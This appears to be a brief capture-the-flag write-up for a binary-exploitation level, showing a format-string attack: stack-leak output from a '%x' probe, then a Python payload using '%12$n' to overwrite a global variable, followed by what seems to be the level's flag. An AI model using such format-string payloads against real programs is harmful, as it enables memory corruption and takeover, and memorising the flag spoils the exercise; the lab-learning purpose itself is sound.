we need to change global varible n  to  0x1025544 (16930116) using 
  0x0804847a <+35>:    call   0x8048350 <fgets@plt>
and
   0x08048450 <+12>:    call   0x8048340 <printf@plt>
   as in the level 3.

print the stack to get location of a buffer
   python -c 'print "aaaa" + " %x" * 15' > /tmp/exploit = 12$n

aaaa b7ff26b0 bffff754 b7fd0ff4
0 0 bffff718 804848d bffff510 
200 b7fd1ac0 b7ff37d0 61616161 20782520 25207825 78252078

python -c 'print "\x10\x98\x04\x08" + "%16930112d%12$n"' > /tmp/exploit
0f99ba5e9c446258a69b290407a6c60859e9c2d25b26575cafc9ae6d75e9456a